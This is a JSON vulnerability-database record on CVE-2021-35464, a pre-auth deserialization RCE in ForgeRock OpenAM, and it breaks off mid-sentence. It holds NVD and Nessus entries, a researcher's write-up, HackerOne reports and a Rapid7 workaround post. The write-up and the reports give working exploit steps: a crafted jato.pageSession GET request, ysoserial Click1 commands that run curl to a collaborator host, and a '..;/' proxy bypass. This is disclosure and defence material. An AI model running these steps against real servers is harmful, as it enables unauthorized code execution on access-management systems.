{"cve": [{"lastseen": "2021-08-03T07:52:26", "description": "ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier", "edition": 3, "cvss3": {}, "published": "2021-07-22T18:15:00", "title": "CVE-2021-35464", "type": "cve", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-08-02T18:03:00", "cpe": [], "id": "CVE-2021-35464", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35464", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}], "nessus": [{"lastseen": "2021-08-05T12:46:10", "description": "The version of Open Access Management (OpenAM) detected on the remote host is affected by a remote code execution vulnerability due to unsafe object deserialization. An unauthenticated, remote attacker can exploit this to execute code on the remote host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-07-29T00:00:00", "type": "nessus", "title": "OpenAM RCE (CVE-2021-35464)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-08-03T00:00:00", "cpe": [], "id": "OPENAM_CVE-2021-35464.NBIN", "href": "https://www.tenable.com/plugins/nessus/152139", "sourceData": "Binary data OPENAM_CVE-2021-35464.NBIN", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-05T12:46:26", "description": "ForgeRock OpenAM is a popular access management software which is used to provide single sign-on (SSO) features to web applications. ForgeRock OpenAM versions below 7.0 suffer from a deserialization vulnerability, allowing a remote unauthenticated attacker to perform remote code execution on the target application.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-06-30T00:00:00", "type": "nessus", "title": "ForgeRock OpenAM < 7.0 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-07T00:00:00", "cpe": [], "id": "WEB_APPLICATION_SCANNING_112812", "href": "https://www.tenable.com/plugins/was/112812", "sourceData": "Binary data WEB_APPLICATION_SCANNING_112812", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-05T12:47:12", "description": "The version of ForgeRock Access Management detected on the remote host is affected by a remote code execution vulnerability due to unsafe object deserialization. An unauthenticated, remote attacker can exploit this to execute code on the remote host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-07-02T00:00:00", "type": "nessus", "title": "ForgeRock Access Management < 7.0 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-08-03T00:00:00", "cpe": [], "id": "FORGEROCK_OPENAM_7_0.NASL", "href": "https://www.tenable.com/plugins/nessus/151291", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151291);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/03\");\n\n script_cve_id(\"CVE-2021-35464\");\n\n script_name(english:\"ForgeRock Access Management < 7.0 RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"ForgeRock Access Management is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ForgeRock Access Management detected on the remote host is affected by a remote code execution\nvulnerability due to unsafe object deserialization. An unauthenticated, remote attacker can exploit this to execute\ncode on the remote host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c3a6dd6c\");\n # https://www.rapid7.com/blog/post/2021/06/30/forgerock-openam-pre-auth-remote-code-execution-vulnerability-what-you-need-to-know/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9b6c0973\");\n script_set_attribute(attribute:\"see_also\", value:\"https://backstage.forgerock.com/knowledge/kb/article/a47894244\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ForgeRock Access Management version 7.0 or later, or apply a workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-35464\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ForgeRock / OpenAM Jato Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:forgerock:access_management\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:forgerock:openam\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"forgerock_access_management_web_detect.nbin\");\n script_require_keys(\"installed_sw/ForgeRock Access Management\");\n script_require_ports(\"Services/www\", 80, 443, 8080, 8443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\n# Note, there are workarounds per https://www.rapid7.com/blog/post/2021/06/30/forgerock-openam-pre-auth-remote-code-execution-vulnerability-what-you-need-to-know/\n# We can't check for them, but for high profile vulns, we typically avoid using paranoia at least at first release.\nvar app = 'ForgeRock Access Management';\nvar port = get_http_port(default:443);\n\nvar app_info = vcf::get_app_info(app:app, webapp:TRUE, port:port);\n\nvar constraints = [\n {'min_version' : '0.0', 'fixed_version' : '6.1', 'fixed_display' : '7.0' },\n {'min_version' : '6.5', 'max_version' : '6.5.3', 'fixed_display' : '7.0' },\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-08-03T11:29:43", "description": "ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier\n\n \n**Recent assessments:** \n \n**ccondon-r7** at June 30, 2021 2:35pm UTC reported:\n\nTrivial RCE with a one-line request. Rapid7 Labs is seeing this product in quite a few large enterprises\u2014patch quickly. Shout-out to Portswigger for their excellent write-up: <https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>\n\nUpdate July 12, 2021: We now have reliable private reports of exploitation in the wild.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {}, "published": "2021-07-22T00:00:00", "type": "attackerkb", "title": "Pre-auth RCE in ForgeRock Access Manager (CVE-2021-35464)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-08-03T00:00:00", "id": "AKB:77E58EB9-547A-4137-BD9B-C2E5E487FA8E", "href": "https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-07-24T09:34:43", "description": "# Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)\n\n\n\n### [Michael Stepankin](/research/michael-stepankin)\n\nResearcher\n\n[@artsploit](https://twitter.com/artsploit)\n\n * **Published:** 29 June 2021 at 11:23 UTC\n\n * **Updated:** 29 June 2021 at 18:15 UTC\n\n \n\n\n\nWhile participating in one private bug bounty program, I discovered a pre-auth\nRCE in ForgeRock OpenAM server - a popular access management solution for web\napplications. In this blog post, I'm going to share some details about how I\nfound this vulnerability and developed an exploit for it. I'm also going to\nexplain [the new Ysoserial deserialization gadget\nchain](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Click1.java)\nI created specifically for this exploit.\n\nIn short, RCE is possible thanks to unsafe [Java\ndeserialization](https://portswigger.net/web-security/deserialization) in the\nJato framework used by OpenAM. Here is the minimal exploit PoC:\n\n```\nGET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>\n```\n\n\n\n<serialized_object> is a serialized Java object, prepended with a null byte\nand encoded with base64url. You can generate this object using my ysoserial\nchain as follows:\n\n```\njava -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Click1 \"curl http://id.burpcollaborator.net\" | (echo -ne \\\\x00 && cat) | base64 | tr '/+' '_-' | tr -d '='\n```\n\n\n\nAlthough I was able to exploit this vulnerability on a number of bug bounty\ntargets, the latest version of ForgeRock OpenAM (7.1) is not affected. As I\ncouldn't find any information about this vulnerability anywhere, I decided to\nshare some details in this blog post.\n\n## The Story\n\nDuring my research into [OAuth](/web-security/oauth) vulnerabilities, I looked\nat different OAuth and [OpenId](/web-security/oauth/openid) systems I can find\non bug bounty scopes. With the help of a few magic scripts James Kettle shared\nwith me, I discovered all servers that respond to the \"/well-known/openid-\nconfiguration\" URI and took a brief look at their configuration. As my\nintention was to find truly impactful vulnerabilities rather than just\n\"something\", I decided to focus on the systems that are either open source or\navailable to download and decompile. ForgeRock OpenAm was one such system that\nI found in the bug bounty scope. It appeared to me as a monstrous Java\nEnterprise application with a huge attack surface, so I decided to take a\ndeeper look into it.\n\n### Obtaining Code & Decompiling\n\nEnterprise Java applications are normally quite big. Even if you have the\nsource code, resolving all the dependencies can be a pretty tedious task to\nsay the least. To make my life easier, I normally search for public Docker\nimages because they already have all the required components. In the case of\nOpenAm, setting up a test instance was as easy as:\n\n```\ndocker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam\n```\n\n\n\nAfter examining the environment within the Docker container, I found that I\ncould obtain the packaged web application from the standard\n/usr/local/tomcat/webapps folder:\n\n```\ndocker cp openam://usr/local/tomcat/webapps/openam.war ./\n```\n\n\n\nNext, we need to unpack the WAR file and decompile all the JARs (libraries)\ninside so that we can look at the source code. I'm a huge fan of using\nIntellij IDEA for dealing with Java code as it provides handy methods for\nsearching and building call graphs. Few people know that it has a built-in\nJava decompiler that can be used from the console. All we need to do is to put\nall compiled JARs into the single directory and call the following command:\n\n```\njava -Xmx7066M -cp \"/Applications/IntelliJ IDEA.app/Contents/plugins/java-decompiler/lib/java-decompiler.jar\" org.jetbrains.java.decompiler.main.decompiler.ConsoleDecompiler -mpm=3 ./lib/openam* ./lib-decompiled\n```\n\n\n\nDecompiling everything might take a while, so I normally choose only JARs that\ndon't look like standard libraries.\n\nAfter that, I created a blank Java project and included everything as\nlibraries and their source. You only need to specify two directories with\ncompiled and decompiled JARs. IDEA expects them to be in the same format that\nthe decompiler tool produces, so we don't need to unpack every single JAR or\nmove anything.\n\n\n\n### Source code analysis\n\nAs with almost all Java web applications, I started by looking into the\nweb.xml file to understand the routing and all available endpoints. Before\nsearching for vulnerabilities, I always try to understand what pages I can\nreach and what authorization filtering is in place. I noticed a mix of classic\nJava servlets and different frameworks, showing that the application has been\ndeveloped over a long period of time.\n\nAfter spending several years analyzing Java code, I've trained my eyes to\ncatch anything related to XML processing, deserialization, reflection, and\nother insecure-by-default Java methods. When it came to OpenAm source, I\nnoticed several places where XML parsing and deserialization occurs in a safe\nmanner, meaning the developers already put some effort into securing the\napplication code.\n\nAlthough [there are numerous tools](https://owasp.org/www-\ncommunity/Source_Code_Analysis_Tools) that can be used to find vulnerabilities\nin code, most of them have serious limitations in terms of coverage.\nEspecially when it comes to analyzing dependencies, source code analyzers\noften can't connect \"sources\" in one component to \"sinks\" in another, missing\nthe potential vulnerability. So, I didn't give up and carry on looking at the\nsource code.\n\n### Jato\n\nOne of the frameworks I noticed in use was [Sun ONE Application Framework\n(Jato)](https://docs.oracle.com/cd/E19786-01/817-4360/index.html) \\- a 20 year\nold legacy framework without a single CVE assigned. As I haven't seen it\nbefore, I decided to take a look at how it handles incoming requests. After\ndecompiling it and studying its source code, I found something interesting:\n\ncom/iplanet/jato/view/ViewBeanBase.class:\n\n```java\nprotected void deserializePageAttributes() {\n if (!this.isPageSessionDeserialized()) {\n ...\n \n String pageAttributesParam = context.getRequest().getParameter(\"jato.pageSession\");\n if (pageAttributesParam != null && pageAttributesParam.trim().length() > 0) {\n try {\n this.setPageSessionAttributes((Map)Encoder.deserialize(Encoder.decodeHttp64(pageAttributesParam), false));\n } catch (Exception var4) {\n```\n\n\n\nIf the request contains a \"jato.pageSession\" query parameter, Jato\ndeserializes its value to the session attribute. Internally, it performs\nnative Java serialization using ObjectInputSteam, with a compression on top.\nTo check my understanding, I had to generate an exploit payload object and\nproperly serialize it with the required format.\n\nAs I was too lazy to work out how exactly the compression is performed, I\nsimply created a new Java project and included jato-2005-05-04.jar and\nysoserial.jar as libraries. Then, I wrote some code to create a payload object\nwith the URLDNS gadget chain and Jato's serializer:\n\n```java\nimport com.iplanet.jato.util.Encoder;\nimport ysoserial.payloads.URLDNS;\nimport java.io.Serializable;\n\npublic class Main {\n \n public static void main(String[] args) throws Exception {\n \n Object payload = new URLDNS().getObject(\"http://xxx4.x.artsploit.com/\");\n byte[] payloadBytes = Encoder.serialize((Serializable) payload, false);\n String payloadString = Encoder.encodeHttp64(payloadBytes, 1000000);\n System.out.println(payloadString);\n }\n}\n```\n\n\n\nThe output of this program was the desired payload for \"jato.pageSession\"\nparameter.\n\nThen, from the OpenAm source code, I discovered several endpoints where the\nJato framework was used. A number of them, including \"/ccversion/Version ''\nwere available without authentication, which was a perfect target.\n\n\n\nAnd... It worked! URLDNS payload triggered the DNS resolution on the local\ntarget. By briefly looking at the available libraries in the classpath, I\nnoticed commons-beanutils:1.9.4 is included, so the CommonsBeanutils1 gadget\nchain from ysoserial can lead to the desired RCE.\n\n### Testing on bug bounty (and failing)\n\nHyped by the exploit working locally, I stumbled upon \"403 Forbidden\" on my\nbug bounty target. The target server was behind a reverse proxy, which\nprohibits access to any URL that does not start from \"/openam/oauth2/\".\n\n\n\nLuckily, the well-known [Apache Tomcat Path traversal\ntrick](https://portswigger.net/research/top-10-web-hacking-techniques-\nof-2018#1) (..;/) worked perfectly to bypass this restriction:\n\n```\nGET /openam/oauth2/..;/ccversion/Version\n```\n\n\n\n\n\nAfter that, I expected to get code execution straight away, but there was\nanother obstacle: neither URLDNS nor CommonsBeanutils1 chais worked on the\nbounty target:( On top of that, the server did not expose any errors. The only\nysoserial gadget chain that worked was JRMPClient, but it only caused a delay\nin the response, meaning that the server tries to connect to a firewalled\nexternal address and hangs.\n\nI was discouraged. Although the JRMPClient chain provided solid evidence that\ndeserialization occurs, I knew it would be hard to convince triagers that this\nwas a critical vulnerability.\n\nAt this point, I realized that the product I have on the bug bounty target was\nnot quite the same as what I'd been using locally. ForgeRock was maintaining\n[an open source version of OpenAM](https://github.com/ForgeRock/openam-\ncommunity-edition) until 2017, but later they decided to develop the\nproprietary version and call it [ForgeRock Access\nManagement](https://backstage.forgerock.com/docs/am). The version I tested\nlocally was one of the open source forks, called\n[OpenIdentityPlatform/OpenAM](https://github.com/OpenIdentityPlatform/OpenAM),\nwhich is very similar but not exactly the same as AM.\n\nAs CommonsBeanutils1 didn't work on my bug bounty target, I decided to find\nanother one.\n\n### Building a custom gadget chain\n\nThose of you who are familiar with Java deserialization may know that\ndeserialization allows attackers to send an object of an arbitrary class and\ntrigger its readObject method. While it was considered harmless for many\nyears, in 2015 @frohoff and @gebl demonstrated several ways to trigger remote\ncode execution from the readObject method in common libraries, including the\nwidely used Apache Commons Collections.\n\nThere are two open source projects that can help us to find other ways to\nexploit readObject, namely\n[gadgetinspector](https://github.com/JackOfMostTrades/gadgetinspector) by\nJackOfMostTrades and [serianalyzer](https://github.com/mbechler/serianalyzer)\nby mbechler. Both of them are basically static code analyzers; they have a\ndefined list of sources (such as \"readObject\") and sinks (such as\nRuntime.exec()).\n\nThe first tool,\n[gadgetinspector](https://github.com/JackOfMostTrades/gadgetinspector),\ndiscovered about 13 potential chains and generated output in the following\nformat:\n\n```\njava/security/cert/CertificateRevokedException.readObject()\n java/util/TreeMap.put()\n org/apache/click/control/Column$ColumnComparator.compare()\n org/apache/click/control/Column.getProperty()\n org/apache/click/control/Column.getProperty()\n org/apache/click/util/PropertyUtils.getValue()\n org/apache/click/util/PropertyUtils.getObjectPropertyValue()\n java/lang/reflect/Method.invoke()\n```\n\n\n\nAll of the chains discovered by this tool had the same \"sink\" method:\n\"java/lang/reflect/Method.invoke\", which allows programmers to invoke\narbitrary Java methods by their name provided in runtime. Since the code\nanalyzer cannot identify whether the dangerous method is being called on user\nsupplied data, we are expected to do it manually.\n\n12 of the potential chains discovered by\n[gadgetinspector](https://github.com/JackOfMostTrades/gadgetinspector) were\nfalse positives, but one chain I highlighted above was somehow interesting.\n\nIt starts with the \"ColumnComparator.compare\" method, which basically compares\ntwo serialized objects by comparing their properties. Now take a look at the\nlast method that calls the sink (PropertyUtils.getObjectPropertyValue):\n\n```java\nprivate static Object getObjectPropertyValue(Object source, String name, Map cache) {\n PropertyUtils.CacheKey methodNameKey = new PropertyUtils.CacheKey(source, name);\n Method method = null;\n \n try {\n method = (Method)cache.get(methodNameKey);\n if (method == null) {\n method = source.getClass().getMethod(ClickUtils.toGetterName(name));\n cache.put(methodNameKey, method);\n }\n \n return method.invoke(source);\n```\n\n\n\n\"Object source\" is the object currently being deconstructed and \"String name\"\nis the property name we can control. Essentially, this method allows us to\ncall an arbitrary [\"Getter\" method](https://www.freecodecamp.org/news/java-\ngetters-and-setters/) on the current object. This getter does not have any\nparameters, we can only specify a property name, which is a \"String\" type.\n\nThis may look not impactful at first glance, but there is a known Java class\n**org.apache.xalan.xsltc.trax.TemplatesImpl** , which is serialializable and\nexecutes the supplied bytecode during the **getOutputProperties** method call.\nIt's widely used in other gadget chains in\n[ysoserial](https://github.com/frohoff/ysoserial) and exactly what we need to\ntrigger the code execution.\n\nTo trigger the initial method (ColumnComparator.compare), gadgetinspector\nsuggested using CertificateRevokedException.readObject at the start of the\ngadget chain, but as it turned out, this wasn't possible. Luckily, the\nCommonsBeanutils1 chain from ysoserial has a similar gadget in the form of\n\"java.util.PriorityQueue.readObject\", which also leads to\n\"ColumnComparator.compare\".\n\nIn the end, I was able to construct the required object by adding a new class\nand a gadget chain to the [ysoserial](https://github.com/frohoff/ysoserial)\nproject. Here is the final execution path from \"readObject\" to \"Runtime.exec\"\n\n```\njava.util.PriorityQueue.readObject()\n java.util.PriorityQueue.heapify()\n java.util.PriorityQueue.siftDown()\n java.util.PriorityQueue.siftDownUsingComparator()\n org.apache.click.control.Column$ColumnComparator.compare()\n org.apache.click.control.Column.getProperty()\n org.apache.click.control.Column.getProperty()\n org.apache.click.util.PropertyUtils.getValue()\n PropertyUtils.getObjectPropertyValue()\n java.lang.reflect.Method.invoke()\n TemplatesImpl.getOutputProperties()\n TemplatesImpl.newTransformer()\n TemplatesImpl.getTransletInstance()\n TemplatesImpl.defineTransletClasses()\n ClassLoader.defineClass()\n Class.newInstance()\n ...\n MaliciousClass.<clinit>()\n ...\n Runtime.exec()\n```\n\n\n\nThe exact way of turning this chain into complete exploit is quite complex,\nbut if you're interested in details of this magic, the best way is to open\nysoserial's code in your editor, and execute the unit test in the\n[ysoserial/test/payloads/PayloadsTest](https://github.com/frohoff/ysoserial/blob/master/src/test/java/ysoserial/test/payloads/PayloadsTest.java)\nclass.\n\nYou can set the breakpoint at\n[ysoserial.payloads.Click1.getObject()](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Click1.java)\nmethod and see the full process of how object reconstruction leads to RCE.\n\n### Let's get this bread\n\nWhen I was finally able to generate the serialized exploit object, it turned\nout it worked smoothly not only in the local environment, but also on my bug\nbounty target.\n\n\n\nSince it was a blind execution case (with no OOB traffic allowed), I managed\nto execute a 'sleep 10' command, which was a huge relief. The ultimate output\nof the \"id\" command also didn't take too long to obtain: I blindly executed\nthis command and saved the result to the web folder:\n\n\n\n### The patch\n\nThis vulnerability was patched in ForgeRock AM version 7.0 by entirely\nremoving the \"/ccvesion\" endpoint, along with other legacy endpoints that use\nJato. At the same time, Jato framework has not been updated for many years, so\nall other products that rely on it may still be affected. ForgeRock have\n[provided a\nworkaround](https://backstage.forgerock.com/knowledge/kb/article/a47894244)\nfor people still running 6.X.\n\nIt's worth noting that this vulnerability does not affect instances running\nwith Java version 9 or newer, since Jato requires classes that have been\nremoved in Java 9. It's [one of the\nreasons](https://backstage.forgerock.com/knowledge/kb/article/a53786484) why\nForgeRock AM versions prior 7, such as 6.5, are still running on Java 8.\n\n### Key takeaways\n\n * Source code analysis and local testing are essential for finding issues like this one.\n * URLDNS and JRMPClient gadget chains are the most universal for testing deserialization in Java\n * Even in solutions designed for authentication, you can find a big attack surface available without any auth.\n * Automatic source code analysis tools are not sufficient if they don't cover dependencies.\n * Java deserialization rocks.", "cvss3": {}, "published": "2021-07-05T00:00:00", "type": "seebug", "title": "ForgeRock AM\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2021-35464\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-05T00:00:00", "id": "SSV:99284", "href": "https://www.seebug.org/vuldb/ssvid-99284", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2021-08-06T03:52:14", "bounty": 0.0, "description": "RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM.\n\n## Impact\n\nAn unauthenticated, 3rd-party attacker or adversary can execute remote code\n \n### Supporting Material/References\n- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-35464\n\n## Steps to Reproduce\n## Steps To Reproduce\n\nTarget domain: \u2588\u2588\u2588\u2588\u2588\n\nFirst we need to build the payload:\n1. Download this jar file \n``wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar``\n\nthen \n``java -jar ysoserial-master-SNAPSHOT.jar Click1 \"curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net\" | (echo -ne \\\\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' | tr -d '\\n' > payload.txt`` \n\nYou need to change the burp Collaborator id to test it properly. \n\nThe payload is now saved in the payload.txt file. \n\nNow we need to use the following request:\n\n```\nGET /\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588=XYZ HTTP/1.1\nHost: 127.0.0.1\n```\nReplace **XYZ** by the payload saved into the payload.txt file. \n\nThe response\n\n```\nHTTP/1.1 302 302\nDate: Thu, 01 Jul 2021 18:11:52 GMT\nServer: Apache\nSet-Cookie: session=expiry=1625163712945691;Max-Age=600;path=/;HttpOnly;Secure;\nX-Frame-Options: SAMEORIGIN\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nContent-Security-Policy: default-src 'unsafe-inline' 'self'; script-src 'unsafe-eval' 'unsafe-inline' 'self' https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588; img-src 'self' https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nCache-Control: no-cache, private\nX-Frame-Options: SAMEORIGIN\nX-Content-Type-Options: nosniff\nCache-Control: private\nLocation: https://127.0.0.1:443/sso/base/AMInvalidURL\nContent-Length: 0\nX-XSS-Protection: 1; mode=block\n\n```\nThe HTTP Request sent the collaborator :\n\n\u2588\u2588\u2588\u2588\u2588\n\n## Suggested Mitigation/Remediation Actions\n\n\n", "cvss3": {}, "published": "2021-07-01T18:21:48", "type": "hackerone", "title": "U.S. Dept Of Defense: Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)", "bulletinFamily": "bugbounty", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-29T19:45:04", "id": "H1:1249456", "href": "https://hackerone.com/reports/1249456", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-06T03:52:13", "bounty": 0.0, "description": "RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM.\n\n\n\n\n\n### Supporting Material/References\n- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464\n\n## Impact\n\nAn unauthenticated, 3rd-party attacker or adversary can execute remote code\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\nForgeRock OpenAM\n\n## CVE Numbers\nCVE-2021-35464\n\n## Steps to Reproduce\nFirst we need to build the payload:\n1. Download this jar file \n``wget https://github.com/Bin4xin/sweet-ysoserial/blob/master/target/ysoserial-0.0.6-SNAPSHOT-all.jar``\n\nthen \n``java -jar ysoserial-master-SNAPSHOT.jar Click1 \"curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net\" | (echo -ne \\\\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' | tr -d '\\n' > payload.txt`` \n\nYou need to change the burp Collaborator id to test it properly. \n\nThe payload is now saved in the payload.txt file. \n\nNow we need to use the following request:\n\n```\nGET /\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588=XYZ HTTP/1.1\nHost: 127.0.0.1\n```\nReplace **XYZ** by the payload saved into the payload.txt file. \n\nThe response\n\n```\nHTTP/1.1 302 Found\nCache-Control: private\nLocation: https://127.0.0.1:443/openam/base/AMInvalidURL\nContent-Length: 0\n```\nThe HTTP Request sent the collaborator :\n\n\u2588\u2588\u2588\n\n## Suggested Mitigation/Remediation Actions\n\n\n", "cvss3": {}, "published": "2021-06-30T08:58:44", "type": "hackerone", "title": "U.S. Dept Of Defense: Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)", "bulletinFamily": "bugbounty", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-29T19:50:15", "id": "H1:1248040", "href": "https://hackerone.com/reports/1248040", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-06-30T16:55:19", "description": "\n\nOn June 29, 2021, security researcher Michael Stepankin ([@artsploit](<https://twitter.com/artsploit>)) [posted details](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>) of [CVE-2021-35464](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-openam-cve-2021-35464>), a pre-auth remote code execution (RCE) vulnerability in ForgeRock [Access Manager](<https://www.forgerock.com/blog/tag/openam>) identity and access management software. ForgeRock front-ends web applications and remote access solutions in many enterprises.\n\nForgeRock has issued [Security Advisory #202104](<https://backstage.forgerock.com/knowledge/kb/book/b21824339#a47894244>) to provide information on this vulnerability and will be updating it if and when patches are available.\n\nThe weakness exists due to unsafe object deserialization via the [Jato framework](<https://docs.oracle.com/cd/E19454-01/819-0728/overview.html>), with a disturbingly diminutive proof of concept that requires a single `GET`/`POST` request for code execution:\n \n \n GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>\n \n\nForgeRock versions below 7.0 running on Java 8 are vulnerable and the weakness also exists in unpatched versions of the Open Identify Platform\u2019s [fork of OpenAM](<https://github.com/OpenIdentityPlatform/OpenAM>). ForgeRock/OIP installations running on Java 9 or higher are unaffected.\n\nAs of July 29, 2021 there are no patches for existing versions of ForgeRock Access Manager. Organizations must either upgrade to version 7.x or apply one of the following workarounds:\n\n**Option 1**\n\nDisable the VersionServlet mapping by commenting out the following section in the AM web.xml file (located in the `/path/to/tomcat/webapps/openam/WEB-INF` directory):\n \n \n <servlet-mapping> \n <servlet-name>VersionServlet</servlet-name> \n <url-pattern>/ccversion/*</url-pattern> \n </servlet-mapping>\n \n\nTo comment out the above section, apply the following changes to the web.xml file:\n \n \n <!-- \n <servlet-mapping> \n <servlet-name>VersionServlet</servlet-name> \n <url-pattern>/ccversion/*</url-pattern> \n </servlet-mapping>\n -->\n \n\n**Option 2**\n\nBlock access to the `ccversion` endpoint using a reverse proxy or other method. On Apache Tomcat, ensure that access rules cannot be bypassed using known path traversal issues: [Tomcat path traversal via reverse proxy mapping](<https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/>).\n\nThe upgrades remove the vulnerable `/ccversion` HTTP 